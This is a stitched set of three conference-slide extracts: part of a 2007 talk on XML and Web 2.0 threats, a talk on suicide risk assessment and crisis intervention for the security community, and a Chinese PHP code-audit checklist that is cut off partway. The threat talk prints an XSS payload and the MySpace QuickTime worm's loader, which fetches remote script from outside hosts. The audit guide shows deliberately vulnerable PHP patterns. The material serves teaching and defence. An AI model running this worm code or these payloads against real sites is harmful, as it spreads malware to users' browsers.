<rdf:li rdf:resource="http://www.acme.com/srch.aspx?term=>'><script>document.location.replace('stam.htm');</script>&y="/>
<rdf:li rdf:resource="http://www.xml.com/pub/a/2002/12/04/som.html"/>
</rdf:Seq>
</items>
</channel>
<item rdf:about="http://www.xml.com/pub/a/2002/12/04/normalizing.html">
<title>Normalizing XML, Part 2</title>
<link>http://www.xml.com/pub/a/2002/12/04/normalizing.html</link>
<description>In this second and final look at applying relational normalization techniques to W3C XML Schema data modeling, Will Provost discusses
when not to normalize, the scope of uniqueness and the fourth and fifth normal forms.</description>
<dc:creator>Will Provost</dc:creator>
<dc:date>2002-12-04</dc:date>
</item>
</rdf:RDF>
Source: Steve Orrin
XSS Worms
Using a website to host the malware code, XSS worms and viruses take control over a web
browser and propagate by forcing it to copy the malware to other locations on the Web to
infect others.
For example, a blog comment laced with malware could snare visitors, commanding their
browsers to post additional infectious blog comments.
–
XSS malware payloads could force the browser to send email, transfer money, delete/modify data,
hack other websites, download illegal content, and many other forms of malicious activity.
On October 4, 2005, The Samy Worm, the first major worm of its kind, spread by
exploiting a persistent Cross-Site Scripting vulnerability in MySpace.com’s personal profile
web page template.
Source Jeremiah Grossman CTO WhiteHat Security
http://www.whitehatsec.com
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
MySpace QT Worm
MySpace allows users to embed movies and other multimedia into their user profiles.
Apple’s Quicktime movies have a feature known as HREF tracks, which allow users to embed a
URL into an interactive movie.
The attacker inserted malicious JavaScript into this Quicktime feature so that when the movie
is played the evil code is executed.
javascript:
void((
function() {
//create a new SCRIPT tag
var e=window.document.createElement('script');
var ll=new Array();
ll[0]='http://www.daviddraftsystem.com/images/';
ll[1]='http://www.tm-group.co.uk/images/';
//Randomly select a host that is serving the full code of the malware
var lll=ll[Math.floor(2*(Math.random()%1))];
//set the SRC attribute to the remote site
e.setAttribute('src',lll+'js.js');
//append the SCRIPT tag to the current document. The current document would be whatever webpage
//contains the embedded movie, in this case, a MySpace profile page. This causes the full code of the malware to
execute.
window.document.body.appendChild(e);
})
Source code from BurntPickle http://www.myspace.com/burntpickle)
Comments and formatting by SPI Dynamics (http://www.spidynamics.com)
Evolving Security Threats
Reconnaissance
Sniffing
Masquerading
Insertion
Injection
xDoS Attacks
Sophistication of Tools
Detect Web
Services
Capture Web
Services Traffic
Stealth Session
Hijack
Insert Malicious
Traffic
Disruption of
Service
Network Scanners
WSDL Scanning
Packet &
Traffic Sniffers
Routing Detours
Replay Attacks
XSS in XML
XPath
Injection
RSS Attacks
AJAX Attacks
Quadratic Blowup
Schema Poisoning
Web2.0 Worms
Multi-Phase/
Universal Tunnel
Targeted Viruses,
Trojans,
Redirectors,
XML-CodeRed
????
The Evolving Environment
De-Perimeterization
XML, Web Services & Web 2.0 Apps are more than just different
classes of network traffic
XML, Web Services & Web 2.0 represent a crucial paradigm shift of the
network perimeter.
Applications and Data Reside EVERYWHERE!
Unprotected Perimeter
Internet, Intranet
and/or Extranet
Perimeter
& DMZ
Web (HTTP)
Distribution
Layer
Application (XML)
Web Services Layer
(XML
Traffic)
NIDP
Netegrity
Oracle
DB
Layer
VPN
Termination
SSL
Termination
Firewall
SOAP
TCP/IP
Network Threats
Evolution of Web Services Security
Proxy solutions:
WS Security Gateway
SOAP Gateway
SOA Gateway
XML Firewall
Trust Enablement
Threat Mitigation
1st Gen
2nd Gen
XML Transparent IPS
(Threat Prevention)
Near-zero provisioning
Wire-speed performance
Streaming XML threat prevention
Known & unknown threats
Heuristics, Anomaly, Policy
based
XML Proxy Trust Gateway
(Trust Enablement)
Web services AAA
Integration with IA&M
Integrity & Confidentiality
Message Level Security
Centralized security
policy
Net Ops
Sec Ops
App Ops
Internet, Intranet
and/or Extranet
Perimeter
& DMZ
Web (HTTP)
Distribution
Layer
Application (XML)
Web Services Layer
(XML
Traffic)
Netegrity
Oracle
DB
Layer
XML Proxy
Trust Gateway
XML
Network Threats
XML Threat Mitigated!
XML Authenticated & Encrypted!
Internet, Intranet
and/or Extranet
Perimeter
& DMZ
(XML
Traffic)
Transparent
XML IPS
XML / Web Services Security:
2nd Generation
• Functional boundary split
• Internal and External threat protected
• Transparent Threat Prevention
• Application-aware Trust Assurance
Summary
We are in a rapidly changing environment with SOA going mainstream and Web
2.0 sites/apps in use by millions.
As with every technology evolution and revolution new and continuously evolving
threats abound. These threats equally target our systems, data, and users.
We as an industry need to collaborate to identify new threats and use the Threat
Model as a means to easily classify and inform our customers, partners, IT and
developers on the attacks and how to mitigate them.
Finally we need to understand that SOA and Web 2.0 are pervasive throughout the
enterprise and in use at the client, therefore we must address these issues early in
the SDL at all of the target points.
Q&A
For More Information:
Steve Orrin
Director of Security Solutions
SSG-SPI
Intel Corporation
[email protected]
Thank you!
Notices
Intel and the Intel logo are trademarks or registered trademarks of
Intel Corporation or its subsidiaries in the United States and other countries.
*Other names and brands may be claimed as the property of others.
**The threats and attack examples provided in this presentation are intended as examples only. They are not functional and cannot be used
to create security attacks. They are not be replicated and/or modified for use in any illegal or malicious activity. "
*** Performance tests and ratings are measured using specific computer systems and/or components and reflect the approximate
performance of Intel products as measured by those tests. Any difference in system hardware or software design or configuration may
affect actual performance. All dates and product descriptions provided are subject to change without notice. This slide may contain certain
forward-looking statements that are subject to known and unknown risks and uncertainties that could cause actual results to differ
materially from those expressed or implied by such statements
Copyright © 2007 Intel Corporation. All Rights Reserved. | pdf |
Suicide Risk Assessment
and Intervention Tactics
Amber Baldet
Trigger Warning:
Discussion of mental health, self-harm,
substance use/abuse, trauma, suicide
This won't be
depressing.
[email protected]
@amberbaldet
Today You Will Learn
● Risk analysis profiling framework
● Identifying clues & warning signs
● Situational threat assessment
● Volunteer & first responder procedure
● How to talk to another human being
Pffft, Qualifications
● Online Suicide Hotline Volunteer
● QPR Gatekeeper Instructor Training
● Online Crisis & Suicide Intervention Specialist
(OCSIS)
● Crisis Intervention & Specialist in Suicide
Prevention (CISSP)
Thank You
Alex Sotirov
Meredith Patterson
Nikita
Myrcurial
Chris Eng
Josh Corman
Jack Daniels
Jericho
Quine
How I Got Here
How I Got Here
Contagion
Exposure to suicide or suicidal behavior directly or
indirectly (via media) influences others to attempt
suicide.
We’re Doing it Wrong
Responsible Journalism & Social Media Standards
What We Should Say
How We Should Say It
"Committed"
Instead, use "completed" or "died by"
Suicide is never the result of a single
factor or event
Suicide is the result of extremely
complex interactions between
psychological, social, and medical
problems
Suicide results, most often, from a long
history of problems
Don't present suicide as a means to a certain end, a
valid coping mechanism, or an understandable
solution to a specific problem
Don't make venerating statements out of context
(e.g. "She was a great kid with a bright future.")
Do temper coverage of displays of grief
Do promote coping strategies and post links to
prevention resources
Our Community
Selected Computer Science Suicides
Alan Turing
Klara Dan von Neumann
Chris McKinstry
Push Singh
Jonathan James
Sam Roweis
Bill Zeller
Len Sassaman
Ilya Zhitomirskiy
Charles Staples Stell
Aaron Swartz
Igal Koshevoy
1954, computation, cryptanalysis
1963, wrote ENIAC controls, MANIAC programmer
2006, artificial intelligence (mindpixel), VLT operator
2007, artificial intelligence (openmind common sense, MIT)
2008, DOD intrusion (ISS software), TJX implication
2010, machine learning (vision learning graphics, NYU)
2011, software development, government release of public data
2011, cypherpunk, cryptography, privacy advocate
2011, free software development (diaspora)
2012, UGA data breach suspect
2013, open development, CC, RSS, digital rights activism
2013, open source development (osbridge, calagator)
Selected Mathematician & Scientist Suicides
Ludwig Boltzman
Paul Drude
Clara Immerwahr
Aleksandr Lyapunov
Emil Fischer
Clemens von Pirquet
Ludwig Haberlandt
George Eastman
Paul Ehrenfest
Wallace Carothers
Lev Schnirelmann
William Campbell
Paul Epstein
Wolfgang Doeblin
Hans Berger
R. Schoenheimer
Felix Hausdorff
Dénes Kőnig
1906, statistical mechanics
1908, electromagnetism
1915, chemical weapons
1918, stability, physics, probability
1919, nobel prize for chemistry
1929, bacteriology, immunology
1932, hormonal contraception
1932, eastman kodak
1933, quantum mechanics
1937, organic chemistry, nylon
1938, differential geometry
1938, NAS president, relativity
1939, epstein zeta function
1940, markov processes
1941, EEG, alpha wave rhythm
1941, isotope tagging
1942, topology, set theory
1944, graph theory
Hans Fischer
Yutaka Taniyama
Jenő Egerváry
Renato Caccioppoli
Hessel de Vries
Percy Bridgman
Jon Hal Folkman
C.P. Ramanujam
George R. Price
D.R. Fulkerson
John Northrop
Valery Legasov
Bruno Bettelheim
Andreas Floer
Robert Schommer
Garrett Hardin
Denice Denton
Andrew E. Lange
1945, nobel prize for chemistry
1958, modularity theorem
1958, combinatorial algo optim.
1959, differential calculus
1959, radiocarbon dating
1961, nobel prize for physics
1969, combinatorics
1974, number theory
1975, game theory, geneticist
1976, network maximum flow
1987, nobel prize for chemistry
1988, chernobyl investigation
1990, jungian/freudian child psych
1991, manifolds, homology
2001, astronomy, astrophysics
2003, tragedy of the commons
2006, electrical engineering
2010, astrophysics
Our Community
Selected Mathematician & Scientist Suicides
Our Community
Ludwig Boltzman
Paul Drude
Clara Immerwahr
Aleksandr Lyapunov
Emil Fischer
Clemens von Pirquet
Ludwig Haberlandt
George Eastman
Paul Ehrenfest
Wallace Carothers
Lev Schnirelmann
William Campbell
Paul Epstein
Wolfgang Doeblin
Hans Berger
R. Schoenheimer
Felix Hausdorff
Dénes Kőnig
1906, statistical mechanics
1908, electromagnetism
1915, chemical weapons
1918, stability, physics, probability
1919, nobel prize for chemistry
1929, bacteriology, immunology
1932, hormonal contraception
1932, eastman kodak
1933, quantum mechanics
1937, organic chemistry, nylon
1938, differential geometry
1938, NAS president, relativity
1939, epstein zeta function
1940, markov processes
1941, EEG, alpha wave rhythm
1941, isotope tagging
1942, topology, set theory
1944, graph theory
Hans Fischer
Yutaka Taniyama
Jenő Egerváry
Renato Caccioppoli
Hessel de Vries
Percy Bridgman
Jon Hal Folkman
C.P. Ramanujam
George R. Price
D.R. Fulkerson
John Northrop
Valery Legasov
Bruno Bettelheim
Andreas Floer
Robert Schommer
Garrett Hardin
Denice Denton
Andrew E. Lange
1945, nobel prize for chemistry
1958, modularity theorem
1958, combinatorial algo optim.
1959, differential calculus
1959, radiocarbon dating
1961, nobel prize for physics
1969, combinatorics
1974, number theory
1975, game theory, geneticist
1976, network maximum flow
1987, nobel prize for chemistry
1988, chernobyl investigation
1990, jungian/freudian child psych
1991, manifolds, homology
2001, astronomy, astrophysics
2003, tragedy of the commons
2006, electrical engineering
2010, astrophysics
The Numbers
Suicide Rate for All Age Groups (US), 2010
Age Group / Rate per 100,000
Total
85 +
75 - 84
65 - 74
55 - 64
45 - 54
35 - 44
25 - 34
15 - 24
5 - 14
5
10
15
20
Annual deaths in men age 18-34 (US)
20,000
15,000
10,000
5,000
Vietnam War
HIV/AIDS
1955 1960 1965 1970 1975 1980 1985 1990 1995
Year / Total Deaths
Suicide
Top chart: American Association of Suicidology,
Suicide in the USA Based on 2010 Data
Bottom chart: Jamison, Kay Redfield.
Night Falls Fast: Understanding Suicide.
Tenth most common cause of
death among the total US
population
Third behind accidents and
homicide for males age 15 – 24
Second only to accidental
death among males age 25 - 34
Clinical Stuff
Mental Illnesses Most Closely Related to Suicide
Mood Disorders
Depression
Major depression
Bipolar disorder (manic-depressive)
Schizophrenia
Auditory hallucinations, paranoid or bizarre delusions, significant social or
occupational dysfunction
Personality
Disorders
Cluster A - paranoia, anhedonia
Cluster B - antisocial, borderline, histrionic, narcissistic
Cluster C - avoidant, dependent, obsessive compulsive
Anxiety Disorders
Continuous or episodic worries or fear about real or imagined events
Panic disorder, OCD, PTSD, social anxiety
Alcoholism /
Substance Abuse
Physical dependence on drugs or alcohol
Clinical Stuff
Suicide Risk Correlation
Previous Suicide Attempt
Depression
Manic Depression
Opiates
Mood Disorders
Substance Abuse
Alcohol
Schizophrenia
Personality Disorders
Anxiety Disorders
AIDS
Huntington's Disease
Multiple Sclerosis
Cancer
Medical Illnesses
40
30
20
10
number of times the general population risk
Source: Jamison, Kay Redfield. Night Falls Fast: Understanding Suicide.
Our Community
I’ll sleep when I’m dead,
Too busy CRUSHING IT
Our Community
Just because I’m paranoid
doesn’t mean
they’re not after me
Further Reading
Paul Quinnett
Kay Redfield Jamison
Susan Blauner
Where Do We Seek Help?
/r/SuicideWatch
Where Do We Seek Help?
Online Crisis Response
30% of callers to suicide hotlines hang up
Online response networks are more
"anonymous" for both caller & volunteer
Efficacy appears to be equivalent, though data
analysis is more difficult online
IMAlive has very consistent training
Volunteer pairing has the same "luck of the
draw" as via phone
Crisis Intervention is Easy
Supporting a depressed friend is hard.
Intervention Hotline
Frientervention
●
Burden of initiation on PIC*
●
PIC assumes you are qualified,
+1 to credibility
●
Interactions has finite bounds
Hotline volunteers must remain
anonymous
Therapists can set their hours of
availability
*PIC = Person In Crisis
●
You may need to initiate
●
Friend sees you as a peer
●
Friends may have an expectation of
"always on" access
●
Lack of improvement in their situation
may degrade your credibility over time
Emotional exhaustion
● Let’s keep encouraging people to open up and
seek help
BUT ALSO
● Let’s start proactively screening and responding
to potential threats
Rethink our Service Model
● Direct Verbal Clues
● Indirect Verbal Clues
● Behavioral Clues
● Situational Clues
Identifying Risk
Take all red flags seriously, confront them
immediately.
● Myth: If someone is talking about suicide,
they won’t do it.
● Myth: Talking to someone about suicide
might put the idea in their head.
Identifying Risk
Identifying Risk
Biological
Mood/Personality Disorders, Family History
Disorders/diseases comorbid with depression
Ethnicity
Age
Sexual Orientation
Biological Sex
Personal / Psychological
Child Abuse
Loss of a Parent
Values / Religious Beliefs
Culture Shock / Shift
Drugs / Alcohol
Environmental
Season
Sociopolitical Climate
Genetic Knowledge
Genetic Load
Bullying
Therapy History
Fundamental Risks Proximal Risks
Geography
Model for Suicide
Urban / Rural
Isolation
Triggers /
"Last Straws"
Perceived Loss
= Real Loss
All causes are "real"
Relationship Crisis
Loss of Freedom
Fired / Expelled
Medical Diagnosis
Any Major Loss
Financial Debt
Relapse
Public Shame
Civilian / Military
PTSD
Career Identity
Increasing hopelessness & contemplation of suicide as a solution
Death
WALL OF RESISTANCE
Identifying Risk
The Wall of Resistance (Protective Factors)
● Find a safe space to talk
● Build rapport & trust
● Ask “The Suicide Question”
● Listen while assessing current threat
● Implement appropriate response plan
● Persuade person to get more qualified help
● Follow up
Oh Shizz Now What
Reporting Obligations
Legal:Are you a licensed professional being paid
to evaluate the PIC’s mental state?
Ethical: Are you a social worker, teacher, or volunteer?
None:
Average person acting in good faith
Building Rapport
Building Rapport
Constructive
Destructive
●
Ask one question at a time
●
Give the person time to respond
●
Repeat back the person's input as
output to confirm that what you
heard is what they meant
●
Say when you don't understand,
ask for clarification
●
Ask open ended questions
●
Interrupting
●
Asking questions in succession
●
Promising to keep a secret
●
"Leading the witness"
●
Trying to solve their problems
●
Rational/Philosophical arguments
●
Minimizing their concerns or fears
Active Listening is not Social Engineering!
All the Feels
Separate Feelings from States of Being
"I AM so lonely [and no one will ever love me]."
"I FEEL lonely right now, but I could talk to a friend."
"I AM a mess [and I could not change even if I wanted to]."
"I FEEL heartbroken and exhausted and furious and overwhelmed right
now, but I didn't always feel this way in the past, and I won't always
feel this way in the future.
I can't change what happened, but I can change how I feel about it."
All the Feels
"I am so burnt out."
"I feel exhausted from working all the time and going home just
stresses me out more."
"I feel exhausted from working all the time and angry that I have to be on call 24/7 just to get an
ounce of recognition from my boss, and the attitude I take home isn't making my family life any
better. And this new guy at work is eyeing my stapler, that bastard."
"That new guy seems pretty good, and I'm terrified he's going to replace me if I can't prove to
everyone that I'm on his level. But what if I try to learn the new stuff, I'll find out I'm not as fast at it as
I used to be? I'm afraid to tell my family how anxious I feel, because I'm their rock and I don't want to
disappoint them. I've been shutting them out, and now I feel guilty that it's gone on for so long that I
can't bring it up and admit this is all my fault. I think about home when I'm at work, and work when
I'm at home, and get nothing constructive done at either."
Directly
● Some of the things you said make me think you’re
thinking about suicide. Am I right?
Indirectly
● Have you ever wished you just didn’t have to deal with all
this anymore?
DON’T SAY
● You’re not thinking about doing anything stupid, are you?
Bringing “It” Up
Listen & Assess
Listen & Assess
Immediate State
●
Suicide in progress → Call 911
●
Drug / Alcohol / Medication influence
●
Potential suicide methods nearby
●
Self harm in progress / just completed
Listen & Assess
Suicidal Ideation & Intent
●
Current suicidal thoughts? Recently?
●
Directly asked about suicidal intent?
●
Current intent exists? Recent past?
●
Where intent exists, is there a plan?
●
Where there’s a plan, how detailed is it?
●
Where means are decided, is access easy?
Listen & Assess
Suicidal Capability & Desire
●
History of prior attempts? Rehearsals?
●
What’s wrong, why now?
●
Why not now?
●
Who else is involved?
Listen & Assess
Risk Indicators
●
Desire
pain, hopelessness, feels like a burden,
feels trapped, intolerably lonely
●
Intent
attempt in progress, plans to kill self/others, preparatory behaviors,
secured means, practice with method
●
Capability
history of attempts, access to firearms, exposure to death by suicide,
currently intoxicated, acute symptoms of mental illness, not sleeping,
out of touch with reality, aggression/rage/impulsivity, recent change in
treatment
Listen & Assess
Buffers
●
Internal
ability to cope with stress, spiritual beliefs,
purpose in life, frustration tolerance,
planning for the future
●
External
immediate supporting relationships, strong
community bonds, people connections, familial
responsibility, pregnancy, engagement with you,
positive therapeutic relationship
Listen & Assess
Outcomes &
Next Actions
●
Persuaded to accept
assistance?
●
Agrees to talk to…
parent, relative, friend, school counselor,
faith based, professional referral
●
Professional referral details
●
Agrees not to use drugs/alcohol?
●
Document the Commitment to Safety
●
Action Plan details
Threat Assessment
Threat Level:
This chart is meant to represent a range of risk levels and interventions, not actual determinations
Source: Suicide Assessment Five-step
Evaluation and Triage (SAFE-T)
Risk Level
Risk / Protective
Factors
Suicidality
Action Plan &
Next Steps
HIGH
Psychiatric disorders with severe
symptoms, or acute precipitating
event; protective factors not
relevant
Potentially lethal suicide
attempt or persistent
ideation with strong intent or
suicide rehearsal
Admission generally indicated unless
a significant change reduces risk.
Suicide precautions
MODERATE
Multiple risk factors,
few protective factors
Suicidal ideation with plan,
but no intent or behavior
Admission may be necessary
depending on risk factors. Develop
crisis plan
Give emergency / crisis numbers
LOW
Modifiable risk factors,
strong protective factors
Thoughts of death, no plan,
intent or behavior
Outpatient referral, symptom
reductions
Give emergency / crisis numbers
Action Plan & Next Steps
● Persuade the PIC to accept your help
in getting better help
● Secure a Commitment to Safety in their own words
● Establish a safe space to ride out the next few hours
● Establish & Implement a follow-up plan
Most commonly (Low or Medium Threat)
○ Enlist others to keep up contact and safety
○ Hand out resources and online references
○ Find appropriate professional care, make an appointment, show up
○ Build a Crisis Plan
Building a Crisis Plan
●
Proactive plan created
during a non-crisis time
●
Identify personal triggers
and warning signs that a
crisis might be
developing
●
Step by step personal
action plan designed to
prevent escalation into
crisis mode
Tactical Crisis Response
Resources
You!
Talking to someone trusted who is educated about suicide intervention can
save a life. If possible, talk in person. While implementing QPR, you can
research alternate referral options and help get the PIC to a safe space.
911
If you think/know an attempt is in progress, call Emergency Services
immediately.
Current or Past Therapist
Professionals with knowledge of the PIC's medical / psychological history are
invaluable. Past therapists can help make quality referrals (e.g. after a move or
due to insurance change). If the PIC won't make the call, you can.
Hospital / Counseling Center
Making the physical move to safe environment drastically lowers mortality risk.
Hotlines
National Suicide Prevention Lifeline
National Hopeline Network
The Trevor Lifeline
Boys Town National Hotline
National Domestic Violence Hotline
Rape, Abuse, Incest National Network (RAINN)
800.273.TALK (8255)
800.784.2433
866.488.7386
800.448.3000
800.799.SAFE (7233)
800.656.HOPE (4673)
Internet Chat
IMAlive
imalive.org
Discussion
Coping & Collaboration
Resources
IRC
freenode #bluehackers
Reddit
(communities come and go, use search)
/r/suicidewatch
/r/suicidology
/r/reasontolive
Web
(send me more!)
bluehackers.org
news.ycombinator.com
Education & Advocacy
American Association of Suicidology
Pursues advancement of suicidology as a science
suicidology.org
Washington, DC
Stop a Suicide (Screening for Mental Health)
Educational resources & crisis intervention tools
stopasuicide.org
Wellesley Hills, MA
American Foundation for Suicide Prevention
Fund research, policy advocacy
afsp.org
New York, NY
The Trevor Project
Resources for LGBT youth
thetrevorproject.org
West Hollywood, CA
Resources
Books:
●
Blauner, Susan Rose. How I Stayed Alive When My Brain Was Trying to Kill Me. ISBN: 0060936215
●
Conroy, David L, Ph.D. Out of the Nightmare: Recovery from Depression and Suicidal Pain. eISBN: 978-1-4502-4734-4
●
Jamison, Kay Redfield. Night Falls Fast: Understanding Suicide. eISBN: 978-0-307-77989-2
●
Jamison, Kay Redfield. Touched with Fire: Manic-Depressive Illness and the Artistic Temperament. eISBN 978-1-439-10663-1
●
Quinnett, Paul G. Counseling Suicidal People: A Therapy of Hope. ISBN: 978-0-9705076-1-7
●
Quinnett, Paul G. Suicide: The Forever Decision. ISBN: 0-8245-1352-5
Data & Resources
●
QPR Gatekeeper Trainer Certification Program: qprinstitute.com
●
Suicide Prevention Resource Center: Suicide Assessment Five-step Evaluation & Triage (SAFE-T) sprc.org
●
Center for Disease Control: Deaths and Mortality Final Data for 2010 cdc.gov
Images & Screenshots:
●
Patient in a Cage - Mass Media Depictions of Mental Illness, historypsychiatry.com
●
Ringing of the Mental Health Bell - The Story of Our Symbol, mentalhealthamerica.net
●
Brick Wall - Solna Brick wall vilt forband,wikimedia.org
●
Burial at the Crossroads, historynotes.info
●
Goethe, The Sorrows of Young Werther, wikimedia.org
●
Godzilla escapes Mount Mihara, flixter.com
●
Golden Gate Bridge - Dead Set, Grateful Dead wikipedia.org
●
Scumbag Brain - anomicofficedrone.wordpress.com
●
Why you shouldn't do what Aaron did - Hacker News
●
thatfatcat images - Imgur 1 Imgur 2 Imgur 3
●
I am going to kill myself in a few hours. AMA - Reddit
●
IMAlive chat interface - imalive.org
References
Suicide Risk Assessment and Intervention Tactics
Questions?
[email protected]
@amberbaldet | pdf |
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
PHP 代码审计
目录
1. 概述 ...................................................................... 2
2. 输入验证和输出显示 ......................................................... 2
1.
命令注入 ............................................................ 3
2.
跨站脚本 ............................................................ 3
3.
文件包含 ............................................................ 4
4.
代码注入 ............................................................ 4
5.
SQL注入 ............................................................. 4
6.
XPath 注入 ........................................................... 4
7.
HTTP响应拆分 ........................................................ 5
8.
文件管理 ............................................................ 5
9.
文件上传 ............................................................ 5
10.
变量覆盖 ............................................................ 5
11.
动态函数 ............................................................ 6
3. 会话安全 .................................................................. 6
1.
HTTPOnly设置 ........................................................ 6
2.
domain 设置 .......................................................... 6
3.
path设置 ............................................................ 6
4.
cookies持续时间 ...................................................... 6
5.
secure 设置 .......................................................... 6
6.
session固定 ......................................................... 7
7.
CSRF ................................................................ 7
4. 加密 ...................................................................... 7
1.
明文存储密码 ......................................................... 7
2.
密码弱加密........................................................... 7
3.
密码存储在攻击者能访问到的文件 ......................................... 7
5. 认证和授权................................................................. 7
1.
用户认证 ............................................................ 7
1.
函数或文件的未认证调用 ................................................ 7
3.
密码硬编码........................................................... 8
6. 随机函数 .................................................................. 8
1.
rand() .............................................................. 8
2.
mt_srand()和mt_rand() ................................................ 8
7. 特殊字符和多字节编码 ........................................................ 8
1.
多字节编码........................................................... 8
8. PHP危险函数 ............................................................... 8
1.
缓冲区溢出........................................................... 8
2.
session_destroy()删除文件漏洞 .......................................... 9
3.
unset()-zend_hash_del_key_or_index漏洞 ................................. 9
9. 信息泄露 ................................................................. 10
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
1.
phpinfo ............................................................ 10
10.
PHP环境 ................................................................ 10
1.
open_basedir设置 .................................................... 10
2.
allow_url_fopen 设置 ................................................. 10
3.
>allow_url_include 设置 ............................................ 10
4.
safe_mode_exec_dir设置 .............................................. 10
5.
magic_quote_gpc 设置 ................................................. 10
6.
register_globals 设置 ................................................ 11
7.
safe_mode设置 ...................................................... 11
8.
session_use_trans_sid 设置 ............................................ 11
9.
display_errors设置 .................................................. 11
10.
expose_php 设置...................................................... 11
1.
概述
代码审核,是对应用程序源代码进行系统性检查的工作。它的目的是为了找到并且修复应
用程序在开发阶段存在的一些漏洞或者程序逻辑错误,避免程序漏洞被非法利用给企业带来不必
要的风险。
代码审核不是简单的检查代码,审核代码的原因是确保代码能安全的做到对信息和资源进
行足够的保护,所以熟悉整个应用程序的业务流程对于控制潜在的风险是非常重要的。审核人员
可以使用类似下面的问题对开发者进行访谈,来收集应用程序信息。
应用程序中包含什么类型的敏感信息,应用程序怎么保护这些信息的?
应用程序是对内提供服务,还是对外?哪些人会使用,他们都是可信用户么?
应用程序部署在哪里?
应用程序对于企业的重要性?
最好的方式是做一个 checklist,让开发人员填写。Checklist 能比较直观的反映应用程序
的信息和开发人员所做的编码安全,它应该涵盖可能存在严重漏洞的模块,例如:数据验证、身
份认证、会话管理、授权、加密、错误处理、日志、安全配置、网络架构。
2.
输入验证和输出显示
大多数漏洞的形成原因主要都是未对输入数据进行安全验证或对输出数据未经过安全处理,
比较严格的数据验证方式为:
1. 对数据进行精确匹配
2. 接受白名单的数据
3. 拒绝黑名单的数据
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
4. 对匹配黑名单的数据进行编码
在 PHP 中可由用户输入的变量列表如下:
$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS
我们应该对这些输入变量进行检查
1. 命令注入
PHP 执行系统命令可以使用以下几个函数:system、exec、passthru、“、shell_exec、
popen、proc_open、pcntl_exec
我们通过在全部程序文件中搜索这些函数,确定函数的参数是否会因为外部提交而改变,
检查这些参数是否有经过安全处理。
防范方法:
1. 使用自定义函数或函数库来替代外部命令的功能
2. 使用 escapeshellarg 函数来处理命令参数
3. 使用 safe_mode_exec_dir 指定可执行文件的路径
2. 跨站脚本
反射型跨站常常出现在用户提交的变量接受以后经过处理,直接输出显示给客户端;存储
型跨站常常出现在用户提交的变量接受过经过处理后,存储在数据库里,然后又从数据库中读取
到此信息输出到客户端。输出函数经常使用:echo、print、printf、vprintf、<%=$test%>
对于反射型跨站,因为是立即输出显示给客户端,所以应该在当前的 php 页面检查变量被
客户提交之后有无立即显示,在这个过程中变量是否有经过安全检查。
对于存储型跨站,检查变量在输入后入库,又输出显示的这个过程中,变量是否有经过安
全检查。
防范方法:
1. 如果输入数据只包含字母和数字,那么任何特殊字符都应当阻止
2. 对输入的数据经行严格匹配,比如邮件格式,用户名只包含英文或者中文、下划线、连字符
3. 对输出进行 HTML 编码,编码规范
< <
> >
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
( (
) )
# #
& &
" "
‘ '
` %60
3. 文件包含
PHP 可能出现文件包含的函数:include、include_once、require、require_once、
show_source、highlight_file、readfile、file_get_contents、fopen、 nt>file
防范方法:
1. 对输入数据进行精确匹配,比如根据变量的值确定语言 en.php、cn.php,那么这两个文件放在
同一个目录下’language/’.$_POST[‘lang’].’.php’,那么检查提交的数据是否是 en 或者
cn 是最严格的,检查是否只包含字母也不错
2. 通过过滤参数中的/、..等字符
4. 代码注入
PHP 可能出现代码注入的函数:eval、preg_replace+/e、assert、call_user_func、
call_user_func_array、create_function
查找程序中程序中使用这些函数的地方,检查提交变量是否用户可控,有无做输入验证
防范方法:
1. 输入数据精确匹配
2. 白名单方式过滤可执行的函数
5. SQL 注入
SQL 注入因为要操作数据库,所以一般会查找 SQL 语句关键字:insert、delete、update、
select,查看传递的变量参数是否用户可控制,有无做过安全处理
防范方法:
使用参数化查询
6. XPath 注入
Xpath 用于操作 xml,我们通过搜索 xpath 来分析,提交给<fo
nt face="Arial, sans-serif">xpath</fo
函数的参数是否有经过安全处理
防范方法:
对于数据进行精确匹配
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
7. HTTP 响应拆分
PHP 中可导致 HTTP 响应拆分的情况为:使用 header 函数和使用$_SERVER 变量。注意 PHP
的高版本会禁止 HTTP 表头中出现换行字符,这类可以直接跳过本测试。
防范方法:
1. 精确匹配输入数据
2. 检测输入输入中如果有\r 或\n,直接拒绝
8. 文件管理
PHP 的用于文件管理的函数,如果输入变量可由用户提交,程序中也没有做数据验证,可
能成为高危漏洞。我们应该在程序中搜索如下函数:copy、rmdir、unlink、delete、fwrite、
chmod、fgetc、fgetcsv、fgets、fgetss、file、file_get_contents、fread、readfile、ftruncate、
file_put_contents、fputcsv、fputs,但通常 PHP 中每一个文件操作函数都可能是危险的。
http://ir.php.net/manual/en/re
f.filesystem.php
防范方法:
1. 对提交数据进行严格匹配
2. 限定文件可操作的目录
9. 文件上传
PHP 文件上传通常会使用 move_uploaded_file,也可以找到文件上传的程序进行具体分析
防范方式:
1. 使用白名单方式检测文件后缀
2. 上传之后按时间能算法生成文件名称
3. 上传目录脚本文件不可执行
4. 注意%00 截断
10.
变量覆盖
PHP 变量覆盖会出现在下面几种情况:
1. 遍历初始化变量
例:
foreach($_GET as $key => $value)
$$key = $value;
2. 函数覆盖变量:parse_str、mb_parse_str、import_request_variables
3. Register_globals=ON 时,GET 方式提交变量会直接覆盖
防范方法:
1. 设置 Register_globals=OFF
2. 不要使用这些函数来获取变量
作者:http://www.sectop.com/
文档制作:http://www.mythhack.com
11.
动态函数
当使用动态函数时,如果用户对变量可控,则可导致攻击者执行任意函数。
例:
<?php
$myfunc = $_GET['myfunc' font>];
$myfunc();
?>
防御方法:
不要这样使用函数
3.
会话安全
1. HTTPOnly 设置
session.cookie_httponly = ON 时,客户端脚本(JavaScript 等)无法访问该 cookie,打
开该指令可以有效预防通过 XSS 攻击劫持会话 ID
2. domain 设置
检查 session.cookie_domain 是否只包含本域,如果是父域,则其他子域能够获取本域的
cookies
3. path 设置
检查 session.cookie_path,如果网站本身应用在/app,则 path 必须设置为/app/,才能
保证安全
4. cookies 持续时间
检查 session.cookie_lifetime,如果时间设置过程过长,即使用户关闭浏览器,攻击者
